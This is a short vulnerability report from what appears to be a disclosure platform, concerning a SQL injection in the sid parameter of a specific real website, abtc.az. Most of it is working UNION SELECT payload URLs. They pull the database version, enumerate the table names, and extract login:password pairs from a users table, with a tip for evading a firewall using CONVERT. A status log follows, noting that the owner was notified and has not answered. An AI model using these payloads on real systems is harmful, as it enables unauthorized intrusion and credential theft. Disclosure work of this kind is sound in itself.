Sql Injection index.php?sid= parametr

abtc.az 11 Июнь 2016, 17:57

Подробная информация

http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid= Zererli Sql Kodlari
http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid=-3 UNION SELECT version(),2 --+- #version
http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid=-3 UNION SELECT table_name,null from information_schema.tables where tables_schema=database() limit 0,1--+- # Limit 0,1 olan yerde 0 <70 araligina qeder deyisherek db-de olan table_name lere baxa bilerisiz
http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid=-3 UNION SELECT CONVERT(group_concat(login,0x3a,passw) USING utf8),null from users limit 0,1--+- # users tablesinden datalari alan zaman firewall aktivleshir ve datalari cekmeye imkan vermir, ona gore Convert ile utf-8 e convert ederek datalari almag olar

# Umumulikden Gelen Datalari Saytin Sourccesini Acarag <title> Bu HISSEDE BAXA BILERSIZ </title>

Записи

  • 21 Октябрь 2016, 13:35
    Статус уязвимости
    Нет ответа от источника

  • 04 Октябрь 2016, 10:02
    Уязвимости присвоен балл
    За перевод уязвимости дано переводчику 9 баллов

  • 04 Октябрь 2016, 10:02
    Уязвимости присвоен балл
    За перевод уязвимости дано автору 0 баллов

  • 16 Июнь 2016, 12:04
    Статус уязвимости
    Отправлено сообщение об уязвимости на электронный адрес источника

  • 12 Июнь 2016, 17:54
    Уязвимости присвоен балл
    Модератор присвоил 9 баллов из 10-и на уязвимости

  • 12 Июнь 2016, 17:54
    Статус уязвимости
    Подтверждено со стороны модератора

  • 11 Июнь 2016, 17:57
    Добавлена уязвимость
    Добавлена уязвимость на BUGemot